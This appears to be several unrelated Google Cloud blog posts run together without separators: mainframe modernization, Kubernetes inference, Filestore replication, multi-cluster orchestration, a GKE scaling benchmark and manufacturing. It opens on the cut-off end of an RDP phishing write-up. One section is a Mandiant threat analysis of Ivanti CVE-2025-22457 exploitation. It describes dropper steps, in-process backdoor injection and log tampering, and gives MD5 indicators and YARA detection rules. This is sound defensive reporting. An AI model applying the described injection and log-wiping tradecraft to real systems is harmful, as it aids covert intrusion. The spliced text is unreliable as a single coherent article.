This campaign demonstrates how common tradecraft can be revitalized with alarming effectiveness through a modular approach. By combining mass emailing, resource redirection, and the creative sleight-of-hand use of RemoteApps, the actor could effectively leverage existing RDP techniques while leaving minimal forensic evidence. This combination of familiar techniques, deployed in an unconventional manner, proved remarkably effective, proving that the true danger of Rogue RDP lies not in the code, but in the con.
In this particular campaign, while control over the target system seems limited, the main capabilities revolve around file stealing, clipboard data capture, and access to environment variables. It is more likely this campaign was aimed at espionage and user manipulation during interaction. Lastly, this campaign once again underscores how readily available red teaming tools intended for education purposes are weaponized by malicious actors with harmful intentions.
Acknowledgments
Special thanks to: Van Ta, Steve Miller, Barry Vengerik, Lisa Karlsen, Andrew Thompson, Gabby Roncone, Geoff Ackerman, Nick Simonian, and Mike Stokkel.
Modernizing mainframes has been a long and expensive process for too long. Today, we’re launching new solutions that bring the combined strength of Gemini models, and our partners’ technologies and services to accelerate mainframe modernization.
Google Cloud generative AI products for mainframe modernization
Google Cloud currently offers three products for mainframe customers looking to reimagine their mainframe applications (significantly change the code logic and design), focusing on assessment, code transformation and testing.
1. Google Cloud Mainframe Assessment Tool (powered by Gemini Models) Google Cloud’s Mainframe Assessment Tool (MAT), now generally available, allows customers to thoroughly assess and analyze their entire mainframe estate, including applications and data, enabling informed decisions on the optimal modernization path. MAT provides in-depth code analysis, generates clear code explanations, summarized application logic and specifications, automated documentation creation, identification of application dependencies, and the generation of initial test cases. This accelerates understanding of the mainframe code and jumpstarts the modernization process. Learn more.
2. Google Cloud Mainframe Rewrite (powered by Gemini Models) To modernize your mainframe applications, Google Cloud’s Mainframe Rewrite, now available in Preview, helps developers transform and reimagine legacy mainframe code into modern languages, such as Java and C#. Mainframe Rewrite provides an IDE environment for developers to iteratively modernize legacy code, test and deploy the modernized application in Google Cloud. Learn more.
3. Dual Run To de-risk the modernization journey, customers can use Google Cloud Dual Run to thoroughly test, certify, and validate the modernized mainframe applications. Dual Run allows users to verify the correctness, completeness, and performance of the modernized code during migration and before the new application goes live in production.
By replaying live events from the production mainframe onto the modernized cloud application, Dual Run compares the output between the two systems to detect any differences. Learn more.
Get started with Google Cloud Mainframe Assessment Tool, Mainframe Rewrite and Dual Run.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e7fc09a0430>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Now you can use our partners’ technology, too
For customers who want to take a more interactive and incremental approach to mainframe modernization, our partner Mechanical Orchard offers a platform that rapidly rewrites mainframe applications into idiomatic modern languages without changing the logic. Once this is achieved, the modern code lends itself to more rapid transformation. This kind of gradual transformation is also the foundation of the AI-accelerated Mainframe Modernization collaboration between global consultancy Thoughtworks and Mechanical Orchard.
The Mechanical Orchard’s modernization platform combines data capture agents with a highly disciplined methodology to modernize legacy systems incrementally and non-disruptively. It reconstructs system behavior from real data flows, rewriting components piece by piece using generative AI into modern, idiomatic, and deterministic code. By shifting integration and testing earlier, it also reduces risk, and ensures old and new code are functionality equivalent by refining itself until it matches the legacy system’s output. Workloads are migrated individually to the cloud production environment. This approach reduces project risk and disruption and can provide faster time to value.
The primary goal is to create a functional equivalent of the legacy system, ensuring that the new code produces identical outputs for every input. Mechanical Orchard supports COBOL-era systems and can generate code in languages like Java, Python, and others.
Google’s leading delivery partners go further to accelerate and de-risk modernization
Our new Mainframe Modernization with Gen AI Acceleratorprogram adds another vital ingredient – the strong experience and capable teams of our expert delivery partners who will bring the above tools to life for customers. We are thrilled to welcome Accenture, EPAMandThoughtworks to the program. They bring rich and practical experience in how to best use these AI-powered solutions to maximize modernization. Their experience in establishing modern engineering practices and providing comprehensive enablement for customer teams will empower organizations to fully embrace their cloud-native future and achieve lasting success.
The program has three phases:
Highly detailed assessment: This phase analyzes the environment using theGoogle Mainframe Assessment Tool (MAT) enhanced with Gemini models and combined with the partners expertise. From this detailed assessment, customers will receive detailed documentation about their mainframe applications (knowledge base and explainability of the mainframe applications), modernization recommendations, and a modernization plan with estimated timelines, resources, and specific approaches.
Proof of value stage
Executing the modernization at scale
For a limited time, qualified customers can access this assessment (typically done in four to eight weeks) conducted by select partners at no-cost (excluding underlying Google Cloud infrastructure usage).
Put us to the test
Google Cloud and partners are ready to apply generative AI to one of the most important modernization challenges. Let’s start with an assessment. For more details and inquiries please write to mainframe@google.com.
Get started with Google Cloud Mainframe Assessment Tool, Mainframe Rewrite and Dual Run.
Written by: John Wolfram, Michael Edie, Jacob Thompson, Matt Lin, Josh Murchie
On Thursday, April 3, 2025, Ivanti disclosed a critical security vulnerability, CVE-2025-22457, impacting Ivanti Connect Secure (“ICS”) VPN appliances version 22.7R2.5 and earlier. CVE-2025-22457 is a buffer overflow vulnerability, and successful exploitation would result in remote code execution. Mandiant and Ivanti have identified evidence of active exploitation in the wild against ICS 9.X (end of life) and 22.7R2.5 and earlier versions. Ivanti and Mandiant encourage all customers to upgrade as soon as possible.
The earliest evidence of observed CVE-2025-22457 exploitation occurred in mid-March 2025. Following successful exploitation, we observed the deployment of two newly identified malware families, the TRAILBLAZE in-memory only dropper and the BRUSHFIRE passive backdoor. Additionally, deployment of the previously reported SPAWN ecosystem of malware attributed to UNC5221 was also observed. UNC5221 is a suspected China-nexus espionage actor that we previously observed conducting zero-day exploitation of edge devices dating back to 2023.
A patch for CVE-2025-22457 was released in ICS 22.7R2.6 on February 11, 2025. The vulnerability is a buffer overflow with a limited character space, and therefore it was initially believed to be a low-risk denial-of-service vulnerability. We assess it is likely the threat actor studied the patch for the vulnerability in ICS 22.7R2.6 and uncovered through a complicated process, it was possible to exploit 22.7R2.5 and earlier to achieve remote code execution.
Ivanti released patches for the exploited vulnerability and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible.
Post-Exploitation TTPs
Following successful exploitation, Mandiant observed the deployment of two newly identified malware families tracked as TRAILBLAZE and BRUSHFIRE through a shell script dropper. Mandiant has also observed the deployment of the SPAWN ecosystem of malware, as well as a modified version of the Integrity Checker Tool (ICT) as a means of evading detection.
Shell-script Dropper
Following successful exploitation of CVE-2025-22457, Mandiant observed a shell script being leveraged that executes the TRAILBLAZE dropper. This dropper injects the BRUSHFIRE passive backdoor into a running /home/bin/web process. The first stage begins by searching for a /home/bin/web process that is a child process of another /home/bin/web process (the point of this appears to be to inject into the web process that is actually listening for connections). It then creates the the following files and associated content:
/tmp/.p: contains the PID of the /home/bin/web process.
/tmp/.m: contains a memory map of that process (human-readable).
/tmp/.w: contains the base address of the web binary from that process
/tmp/.s: contains the base address of libssl.so from that process
/tmp/.r: contains the BRUSHFIRE passive backdoor
/tmp/.i: contains the TRAILBLAZE dropper
The shell script then executes /tmp/.i, which is the second stage in-memory only dropper tracked as TRAILBLAZE. It then deletes all of the temporary files previously created (except for /tmp/.p), as well as the contents of the /data/var/cores directory. Next, all child processes of the /home/bin/web process are killed and the /tmp/.p file is deleted. All of this behavior is non-persistent, and the dropper will need to be re-executed if the system or process is rebooted.
TRAILBLAZE
TRAILBLAZE is an in-memory only dropper written in bare C that uses raw syscalls and is designed to be as minimal as possible, likely to ensure it can fit within the shell script as Base64. TRAILBLAZE injects a hook into the identified /home/bin/web process. It will then inject the BRUSHFIRE passive backdoor into a code cave inside that process.
BRUSHFIRE
BRUSHFIRE is a passive backdoor written in bare C that acts as an SSL_read hook. It first executes the original SSL_read function, and checks to see if the returned data begins with a specific string. If the data begins with the string, it will XOR decrypt then execute shellcode contained in the data. If the received shellcode returns a value, the backdoor will call SSL_write to send the value back.
SPAWNSLOTH
As detailed in our previous blog post, SPAWNSLOTH acts as a log tampering component tied to the SPAWNSNAIL backdoor. It targets the dslogserver process to disable both local logging and remote syslog forwarding.
SPAWNSNARE
SPAWNSNARE is a utility that is written in C and targets Linux. It can be used to extract the uncompressed linux kernel image (vmlinux) into a file and encrypt it using AES without the need for any command line tools.
SPAWNWAVE
SPAWNWAVE is an evolved version of SPAWNANT that combines capabilities from other members of the SPAWN* malware ecosystem. SPAWNWAVE overlaps with the publicly reported SPAWNCHIMERA and RESURGE malware families.
Attribution
Google Threat Intelligence Group (GTIG) attributes the exploitation of CVE-2025-22457 and the subsequent deployment of the SPAWN ecosystem of malware to the suspected China-nexus espionage actor UNC5221. GTIG has previously reported UNC5221 conducting zero-day exploitation of CVE-2025-0282, as well as the exploitation CVE-2023-46805 and CVE-2024-21887.
Furthermore, GTIG has also previously observed UNC5221 conducting zero-day exploitation of CVE-2023-4966, impacting NetScaler ADC and NetScaler Gateway appliances. UNC5221 has targeted a wide range of countries and verticals during their operations, and has leveraged an extensive set of tooling, spanning passive backdoors to trojanized legitimate components on various edge appliances.
GTIG assesses that UNC5221 will continue pursuing zero-day exploitation of edge devices based on their consistent history of success and aggressive operational tempo. Additionally, as noted in our prior blog post detailing CVE-2025-0282 exploitation, GTIG has observed UNC5221 leveraging an obfuscation network of compromised Cyberoam appliances, QNAP devices, and ASUS routers to mask their true source during intrusion operations.
Conclusion
This latest activity from UNC5221 underscores the ongoing sophisticated threats targeting edge devices globally. This campaign, exploiting the n-day vulnerability CVE-2025-22457, also highlights the persistent focus of actors like UNC5221 on edge devices, leveraging deep device knowledge and adding to their history of using both zero-day and now n-day flaws. This activity aligns with the broader strategy GTIG has observed among suspected China-nexus espionage groups who invest significantly in exploits and custom malware for critical edge infrastructure.
Recommendations
Mandiant recommends organizations immediately apply the available patch by upgrading Ivanti Connect Secure (ICS) appliances to version 22.7R2.6 or later to address CVE-2025-22457. Additionally organizations should use the external and internal Integrity Checker Tool (“ICT”) and contact Ivanti Support if suspicious activity is identified. To supplement this, defenders should actively monitor for core dumps related to the web process, investigate ICT statedump files, and conduct anomaly detection of client TLS certificates presented to the appliance.
Acknowledgements
We would like to thank Daniel Spicer and the rest of the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE, we would like to specifically thank Christopher Gardner and Dhanesh Kizhakkinan of FLARE for their support.
Indicators of Compromise
To assist the security community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.
Code Family
MD5
Filename
Description
TRAILBLAZE
4628a501088c31f53b5c9ddf6788e835
/tmp/.i
In-memory dropper
BRUSHFIRE
e5192258c27e712c7acf80303e68980b
/tmp/.r
Passive backdoor
SPAWNSNARE
6e01ef1367ea81994578526b3bd331d6
/bin/dsmain
Kernel extractor & encryptor
SPAWNWAVE
ce2b6a554ae46b5eb7d79ca5e7f440da
/lib/libdsupgrade.so
Implant utility
SPAWNSLOTH
10659b392e7f5b30b375b94cae4fdca0
/tmp/.liblogblock.so
Log tampering utility
YARA Rules
rule M_APT_Installer_SPAWNANT_1
{
meta:
author = "Mandiant"
description = "Detects SPAWNANT. SPAWNANT is an
Installer targeting Ivanti devices. Its purpose is to persistently
install other malware from the SPAWN family (SPAWNSNAIL,
SPAWNMOLE) as well as drop additional webshells on the box."
strings:
$s1 = "dspkginstall" ascii fullword
$s2 = "vsnprintf" ascii fullword
$s3 = "bom_files" ascii fullword
$s4 = "do-install" ascii
$s5 = "ld.so.preload" ascii
$s6 = "LD_PRELOAD" ascii
$s7 = "scanner.py" ascii
condition:
uint32(0) == 0x464c457f and 5 of ($s*)
}
rule M_Utility_SPAWNSNARE_1 {
meta:
author = "Mandiant"
description = "SPAWNSNARE is a utility written in C that targets
Linux systems by extracting the uncompressed Linux kernel image
into a file and encrypting it with AES."
strings:
$s1 = "x00extract_vmlinuxx00"
$s2 = "x00encrypt_filex00"
$s3 = "x00decrypt_filex00"
$s4 = "x00lbb_mainx00"
$s5 = "x00busyboxx00"
$s6 = "x00/etc/busybox.confx00"
condition:
uint32(0) == 0x464c457f
and all of them
}
rule M_APT_Utility_SPAWNSLOTH_2
{
meta:
author = "Mandiant"
description = "Hunting rule to identify strings found in SPAWNSLOTH"
strings:
$dslog = "dslogserver" ascii fullword
$hook1 = "g_do_syslog_servers_exist" ascii fullword
$hook2 = "ZN5DSLog4File3addEPKci" ascii fullword
$hook3 = "funchook" ascii fullword
condition:
uint32(0) == 0x464c457f and all of them
}
Over the past ten years, Kubernetes has become the leading platform for deploying cloud-native applications and microservices, backed by an extensive community and boasting a comprehensive feature set for managing distributed systems. Today, we are excited to share that Kubernetes is now unlocking new possibilities for generative AI inference.
In partnership with Red Hat and ByteDance, we are introducing new capabilities that optimize load balancing, scaling and model server performance on Kubernetes clusters running large language model (LLMs) inference. These capabilities build on the success of LeaderWorkerSet (LWS), which enables multi-host inference for state-of-the-art models (including ones with 671B parameters), and push the envelope on what’s possible for gen AI Inference on Kubernetes.
First, the new Gateway API Inference Extension now supports LLM-aware routing, rather than traditional round robin. This makes it more cost-effective to operationalize popular Parameter-Efficient Fine-Tuning (PEFT) techniques such as Low-Rank Adaptation (LoRA) at scale, by using a base model and dynamically loading fine-tuned models (‘adapters’) based on user need. To support PEFT natively, we also introduced new APIs, namely InferencePool and InferenceModel.
Second, a new inference performance project provides a benchmarking standard for detailed model performance insights on accelerators and HPA scaling metrics and thresholds. With the growth of gen AI inference on Kubernetes, it’s important to be able to measure the performance of serving workloads alongside the performance of model servers, accelerators, and Kubernetes orchestration.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3ec2e20df5e0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
Third, Dynamic Resource Allocation, developed with Intel and others, simplifies and automates how Kubernetes allocates and schedules GPUs, TPUs, and other devices to pods and workloads. When used along with the vLLM inference and serving engine, the community benefits from scheduling efficiency and portability across accelerators.
“Large-scale inference with scalability and flexibility remains a challenge on Kubernetes. We are excited to collaborate with Google and the community on the Gateway API Inference Extension project to extract common infrastructure layers, creating a more unified and efficient routing system for AI serving — enhancing both AIBrix and the broader AI ecosystem.” – Jiaxin Shan, Staff Engineer at Bytedance, and Founder at AIBrix
“We’ve been collaborating with Google on various initiatives in the Kubernetes Serving working group, including a shared benchmarking tool for gen AI inference workloads. Working with Google, we hope to contribute to a common standard for developers to compare single-node inference performance and scale out to the multi-node architectures that Kubernetes brings to the table.” – Yuan Tang, Senior Principal Software Engineer, Red Hat
“We are partnering with Google to improve vLLM for operationalizing deployments of open-source LLMs for enterprise, including capabilities like LoRA support and Prometheus metrics that enable customers to benefit across the full stack right from vLLM to Kubernetes primitives such as Gateway. This deep partnership across the stack ensures customers get production ready architectures to deploy at scale” – Robert Shaw, vLLM Core Committer and Senior Director of Engineering Neural Magic (acquired by Red Hat)
Together, these projects allow customers to qualify and benchmark accelerators with the inference performance project, operationalize scale-out architectures with LLM-aware routing with the Gateway API Inference extension, and provide an environment with scheduling and fungibility benefits across a wide range of accelerators with DRA and vLLM. To try out these new capabilities for running gen AI inference on Kubernetes, visit Gateway API Inference Extension, the inference performance project or Dynamic Resource Allocation. Also, be sure to visit us at KubeCon in London this week, where we’ll be participating in the keynote as well as many other sessions. Stop by Booth S100 to say hi!
We are excited to announce Filestore Instance Replication on Google Cloud, which helps customers meet their business continuity goals and regulatory requirements. The feature offers an efficient replication point objective (RPO) that can reach 30 minutes for data change rates of 100 MB/sec.
Our customers have been telling us they need to meet regulatory and business requirements for business continuity, and have been looking for file storage that provides that capability. Instance Replication lets customers replicate Filestore instances to a secondary location – a remote region, or a separate zone within a region. The feature continuously replicates increments and changes in data taking place on the active instance to the standby instance in the secondary location.
The process of replicating an instance is simple:
A new designated standby instance is created in the remote location
The feature performs an initial sync moving all data from the active source instance to the standby replica instance
Upon completion, incremental data is continuously replicated
An RPO metric lets customers monitor the replication process
In the event of an outage in the source region, customers can break the replication
Customers can simply connect their application to the replica instance and continue their business – with minimal data loss.
It can take as little as 2 minutes to set up, monitoring is simple, and breaking the replication is achieved using a single command.
The feature is available on Filestore Regional, Zonal, Enterprise and High Scale tiers. Instance Replication functionality is provided at no charge and customers are billed for the components used in the service, which are the Filestore instances and cross-regional networking. Give it a try here.
Today, we’re excited to announce the public preview of Multi-Cluster Orchestrator, a new service designed to streamline and simplify the management of workloads across Kubernetes clusters. Multi-Cluster Orchestrator lets platform and application teams optimize resource utilization, enhance application resilience, and accelerate innovation in complex, multi-cluster environments.
As organizations increasingly adopt Kubernetes to deploy and manage their applications, the need for efficient multi-cluster management becomes critical. Challenges such as resource scarcity, ensuring high availability, and managing deployments across diverse environments create significant operational overhead. Multi-Cluster Orchestrator addresses these challenges by providing a centralized orchestration layer that abstracts away the complexities of underlying Kubernetes infrastructure matching workloads with capacity across regions.
Key benefits of Multi-Cluster Orchestrator
Simplified multi-cluster workload management: Multi-Cluster Orchestrator lets you manage workloads across multiple Kubernetes clusters as a single unit. Platform teams can focus on defining guardrails and policies, while application teams can concentrate on their core workloads.
Intelligent resource optimization: Multi-Cluster Orchestrator tackles the challenge of resource scarcity by intelligently placing workloads in clusters with available capacity, such as those with GPUs. This helps ensure optimal resource utilization and helps organizations avoid stockouts without incurring unnecessary costs.
Enhanced application resilience: Multi-Cluster Orchestrator facilitates regional failure tolerance for critical applications by enabling deployments across multiple clusters.
Tight integration with existing tools: Multi-Cluster Orchestrator is designed to complement existing workflows and tools. For example, the Argo CD plugin lets you integrate Multi-Cluster Orchestrator with their GitOps practices, leveraging their existing continuous delivery pipelines.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3ecbc6b74850>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
Who should use Multi-Cluster Orchestrator?
Multi-Cluster Orchestrator is designed for:
Platform engineering teams with a GitOps focus: GitOps-focused teams building and managing general serving applications across multiple GKE regions using tools like Argo CD can leverage Multi-Cluster Orchestrator to simplify multi-cluster deployments. In addition, teams with custom continuous delivery (CD) solutions can use it to provide cluster target recommendations, enhancing their existing deployment workflows.
AI/ML inferencing platform teams: Teams looking for dynamic resource allocation to minimize stockout risks and optimize costs for their AI/ML inferencing applications can benefit from Multi-Cluster Orchestrator’s intelligent workload placement.
Early adopters of Multi-Cluster Orchestrator are already seeing value from the tool. Abridge, for one, a company dedicated to delivering sophisticated AI solutions for clinical conversations in healthcare, recognizes its promise
“Multi-Cluster Orchestrator offers an opportunity to further scale our inference workloads across multiple GKE clusters. Its ability to intelligently manage resource allocation could lead to improved availability and cost efficiency. We’re evaluating how automating workload placement and scaling with this technology can streamline our operational framework and advance our AI-driven processes.” – Trey Caliva, Staff Platform Engineer, Abridge
Get started with Multi-Cluster Orchestrator
At Google Cloud, we’re committed to helping organizations build and manage their applications at scale. Multi-Cluster Orchestrator represents a significant step towards simplifying multi-cluster Kubernetes management and enabling the next generation of cloud-native applications.
Multi-Cluster Orchestrator is now available in public preview. To learn more and get started, visit the documentation.
At Google Cloud, we’re continuously working on Google Kubernetes Engine (GKE) scalability so it can run increasingly demanding workloads. Recently, we announced that GKE can support a massive 65,000-node cluster, up from 15,000 nodes. This signals a new era of possibilities, especially for AI workloads and their ever-increasing demand for large-scale infrastructure.
This groundbreaking achievement was built upon Google’s prior experience training large language models (LLMs) on a 50,000+ chip TPU cluster. By leveraging technologies like TPU multislice training, GKE can now handle a massive number of virtual machines while addressing challenges in resource management, scheduling, and inter-node communication.
In addition to demonstrating GKE’s capability to handle extreme scale, this breakthrough also offers valuable insights for optimizing large-scale AI training on Google Cloud.
Running large AI workloads on Kubernetes means running both resource-intensive training and dynamic inference tasks. You need a huge amount of computational resources to train a massive, interconnected model. Simultaneously, inference workloads need to scale efficiently in response to changing customer demand. Mixing training and inference — two workloads with different characteristics — on the same cluster presents a number of complexities that need to be addressed.
In this blog post, we explore a benchmark that simulates these massive AI workloads on a 65,000-node GKE cluster. As we look to develop and deploy even larger LLMs on GKE, we regularly run this benchmark against our infrastructure as a continuous integration (CI) test. We look at its results in detail, as well as the challenges we faced and ways to mitigate them.
Benchmark design
As with any benchmark, the devil is in the details. Below, here are some of the requirements we set forth for our test environment:
CPU-only: For the purpose of benchmarking the Kubernetes control plane, we opted to use CPU-only machines, which is a much more cost-effective way to measure the performance of the cluster on a large scale compared to GPUs or TPUs.
Cluster size: At the start of the benchmark we created a 65,000-node cluster. We assumed the cluster would not need to autoscale on the node level, but that workloads dynamically change in size, and can be stopped and restarted.
Real-life scenarios: We wanted to show the GKE cluster’s ability to accommodate scaling, ease of use, and workload fungibility between training and inference based on real-life scenarios and use cases. As such, the benchmark focused on scenario-related metrics like scheduler throughput. Specifically, we prioritized a usage pattern that combines a very large training job (50K+ nodes) with a scalable inference workload.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud containers and Kubernetes’), (‘body’, <wagtail.rich_text.RichText object at 0x3ebe97ca7fa0>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectpath=/marketplace/product/google/container.googleapis.com’), (‘image’, None)])]>
Cluster setup
We created the 65,000-node cluster using a publicly available Terraform configuration, with variables to set the cluster name and project. To achieve this scale, we followed best practices from the GKE documentation on planning large GKE clusters.
kube-scheduler
We also used a customized kube-scheduler configuration for our simulated workload. At 500 bindings per second, we were able to schedule a large-scale workload, ensuring high efficiency of the resources.
Simulating the AI workload
In our experiment, we used a StatefulSet with Pods running sleep containers (minimal containers running a sleep command for the duration of the pod’s running) to simulate the behavior of a large-scale AI workload. This allowed us to closely examine resource allocation and scheduling within the Kubernetes cluster without having to run distributed AI workloads on CPU-based VMs. When designing the workload, we made the following design decisions:
Choosing the right Kubernetes workload: For our test setup we focused on the StatefulSet API, which is commonly used in generative AI workloads. We used a headless service for the StatefulSet to mimic communication between Pods within the distributed training workload.
Ensuring a single-user-workload Pod per node (in addition to DaemonSets): We configured the StatefulSet to ensure that only one Pod was scheduled per Node, which reflects how most users currently run their AI workloads. We did this by specifying the hostPort within the StatefulSet’s Pod spec template.
Simulating “all-or-nothing” preemption: To accurately reflect the dynamics of AI workloads, especially the “all-or-nothing” nature of many distributed training jobs, we implemented a manual scale-down mechanism. This means we trigger scale-down of the training workload right after the inference workload scales up.
By employing these techniques, we were able to create a realistic simulation of an AI workload within our Kubernetes cluster. This environment enabled us to thoroughly test the scalability, performance, and resilience of the cluster under a variety of conditions.
Tooling
To develop our benchmark, we used several tools, including ClusterLoader2 to build the performance test, Prow to run the test as part of our continuous integration pipeline, Prometheus to collect metrics, and Grafana to visualize them.
Performance test
Our simulated scenario mimics a mix of AI workloads: AI training and AI inference. There are five phases, with each simulating a different real-life scenario that occurs over the course of the LLM development and deployment lifecycle.
Phase #1: Single workload — creating a large training workload (StatefulSet) from scratch In the first phase, we run a large training workload, represented by a StatefulSet with 65,000 nodes. This represents a large-scale distributed training that spans 65,000 VMs. Each Pod maps to a single Node, utilizing all of the resources accessible within the cluster.
The phase is complete when the training job terminates, ending in an empty cluster.
Phase #2: Mixed workload — training and inference workloads (StatefulSets) In the second phase, we run a mixed workload environment within a single cluster, highlighting the capability of running different types of workloads and sharing resources. This involves concurrently running one training workload with 50,000 Pods and another inference workload with 15,000 Pods. Each Pod is assigned to a single Node, helping to ensure full utilization of the cluster’s resources. Notably, the inference workload is given higher priority than the training workload.
Phase #3: Scale up of inference workload (StatefulSet), training workload disruption In Phase #3, we scale up the inference workload, which in real life is typically due to increased traffic/demand on the services. Since the inference workload has a higher priority, it interrupts the training workload. Once the inference workload is scheduled and running, we recreate the training workload. Given that the training workload has a lower priority, it stays in pending state as long as the inference workload is working at full capacity.
Phase #4: Scale down inference workload, training workload recovery Here, we simulate a decrease in traffic on the inference workload, triggering the scale-down of the inference workload from 65,000 Pods back to 15,000 Pods. This enables the pending training workload to be scheduled and run again.
Phase #5: Training workload finishes Finally, we come to the end of the training, indicated by the termination and deletion of training workload, freeing up resources in the cluster.
Note: In our tests we used StatefulSets as this is what large AI model producers use. However with the latest advancements, Kubernetes Job and JobSet are the recommended APIs to run ML training workloads. Those abstractions were also tested at scale, but in dedicated tests.
Metrics
For our test we used ClusterLoader2’s built-in measurements to collect relevant metrics, metrics from Prow logs, and internal GKE metrics.
Key metrics measured by ClusterLoader2 include:
Pods state transition duration: How long it takes a workload’s Pod to change state (e.g., to reach running state or to be deleted); monitoring a workload’s in-progress status (i.e., how many Pods are created, running, pending schedule, or terminated).
Pod startup latency: The time it takes for a Pod to go from being created to be marked as running.
Scheduling throughput: The rate at which Pods are successfully assigned to Nodes
In addition to the ClusterLoader2 measurements, we also measured:
Cluster creation/deletion time
Various cluster metrics that are exported to Prometheus (e.g., API server latency metrics)
Benchmark results
The results we present in this document are based on a simulation that runs at a specific point in time. To provide context, here’s a timeline with an explanation of when each phase took place.
Observing workloads
Based on data from ClusterLoader2, we generated the chart below, which summarizes all the phases and how the training and inference workload interact with one another throughout the performance test.
In phase #1, we see a smooth workload creation process in which pods are created pretty quickly, and scheduled with only minor delay. The process takes ~2.5m to create, schedule and run 65,000 Pods on an empty cluster (with caveats — see the previous section).
In phase #2, we observe a similar smooth creation process for the training workload, with 50,000 Pods created in under 2 min from an empty cluster. Moreover, we observe the creation of 15,000 Pods for the inference workload in under a minute from a nearly full cluster, demonstrating the fast scheduling even when the cluster is not empty.
In Phase #2, both training and inference workloads were scheduled quickly. Notably, 15,000 inference Pods were created in under a minute on a nearly full cluster, demonstrating fast scheduling even on a non-empty cluster.
During phase #3, we observe the scale up of the inference workload to 65,000 Pods and the disruption and termination of the training workload. Scheduling inference Pods suffers some delay compared to phase 2 due to waiting for the training Pods to be evicted from the Nodes. Nonetheless, the entire startup process for the inference workload takes less than four minutes in total.
After terminating and recreating the training workload, we observe its Pods in pending state (as seen between 7:20 and 7:25 in the graph, with the dotted blue representing created training pods, at 50,000 and the dotted orange representing the running training with Pods at 0) while the higher-priority inference workload occupies the full 65,000 Nodes.
Cluster performance
We use the metrics collected by Prometheus for information about control-plane performance across the experiment’s timeline. For example, you can see the P99 API call latency across various resources, where all API calls, including write calls, are under 400 ms latency — well within the 1s threshold; this satisfies the OSS SLO for resource-scoped API calls.
While API call latency provides a general indication of cluster health, particularly for the API server (as demonstrated by the consistently low response times shown previously), Pod creation and binding rates provide a more holistic perspective on overall cluster performance, validating the performance of the various components involved in the Pod startup process. Our benchmark reveals that a standard GKE cluster (without advanced scheduling features) can achieve a Pod creation rate of 500 Pods per second (see graph below).
Metrics results
Below you can see a table that summarizes the metrics collected through the different phases of the performance test. Please note that these metrics are a result of our experiments done at the time and shouldn’t be taken as SLOs or guarantees of performance in all scenarios. Changes in performances might be observed due to changes in GKE versions.
Final remarks
In this experiment, we showcase the GKE cluster’s ability to manage substantial and dynamic workloads. While you find specific metrics in the above table, here are a few general observations about running large AI workloads on GKE, and the potential implications for your own workloads.
Scaling efficiency: Our experiment involved rapid scaling of massive workloads, both up and down. However, even for such large workloads, scaling was quite efficient. Creating a StatefulSet of 65,000 Nodes and having all the Pods run on an empty cluster took only 2 min and 24 seconds! Scaling up and down during phase 3 and 4 were also both quite fast, with inference workload taking ~4min to scale up from 15,000 to 65,000 Pods (including waiting for training workload to preempt), and ~ 3min to scale down to 15,000 Pods again.
Image pulling and Pod startup latency: During Phase 1, we experienced a bit of degradation in Pod startup latency, with P100 around 20.4s compared to 5.6s and 5.0s in phase 2. This is due to image pull-time from Artifact Registry. It wasn’t relevant in later phases as Pods used the cached images already on the Nodes. Moreover, in this benchmark we used a small sleep container to run on the Pods of the StatefulSet — a workload that we knew wouldn’t cause additional delays that might impact performance. However, in a real-life scenario with larger images, prepare to see slower initial Pod startup times, since size of a typical image for an ML workflow will likely be in the order of gigabytes.
Workload diversity and its effect on scheduling throughput: The introduction of mixed workloads (training and inference) in Phase #2 and later scaling and preemption in Phase #3 adds a layer of complexity. This affected the median/average scheduling throughput, bringing it down to 222/208 Pod/s (from 496/417 Pod/s) respectively.
Performance bottlenecks: Examining detailed metrics can help identify potential bottlenecks. For instance, high Pod startup latency could indicate issues with resource provisioning or image pulling. We observed such issues and we were able to bring down initial StatefulSet creation time in phase 1 from 12 min to 2min 30 sec by tweaking the setup a bit. This included using Artifact Registry instead of Container Registry, as well as disabling the auto-mounting of service account credentials to StatefulSet by Kubelet (using automountServiceAccountToken: false).
Overall, the experiment’s focus on large-scale workloads makes our results particularly relevant for organizations deploying machine learning or data-processing applications on Kubernetes. The experiments, focused on Kubernetes Control Plane (KCP) performance, are part of our regular CI tests. We are continuously expanding these tests to validate the growing demands of running AI workloads on these massive clusters. Stay tuned for future blog posts exploring more sophisticated scenarios on a 65,000-node cluster, including the use of accelerators and the evaluation of diverse AI workloads on GKE.
In today’s dynamic business landscape, manufacturers are facing unprecedented pressure. The relentless pace of e-commerce combined with a constant threat of supply chain disruptions, creates a perfect storm. To overcome this complexity, leading manufacturers are leveraging the power of AI and integrated data solutions to not only survive, but thrive.
This week, at Hannover Messe, Google Cloud is announcing the latest release of its signature solution, Manufacturing Data Engine (MDE), to help manufacturers unlock the full potential of their operational data and drive AI transformation on-and-off the factory floor faster. We believe it will play a critical role in helping forward thinking leaders address five critical trends that are shaping the future of manufacturing.
1. B2B buyers demand digital-first experiences
Business buyers are increasingly adopting consumer-like behaviors, forgoing traditional, linear sales cycles. According to Gartner, 80% of B2B sales will be generated digitally in 2025. This shift demands a digital-first approach that extends beyond online storefronts to create seamless, personalized experiences across the entire customer journey.
For leading manufacturers, AI-powered user experiences can help address this shift in behavior. By leveraging AI to personalize product recommendations, streamline online ordering, and provide real-time customer support, manufacturers can meet the demands of digitally-savvy buyers.
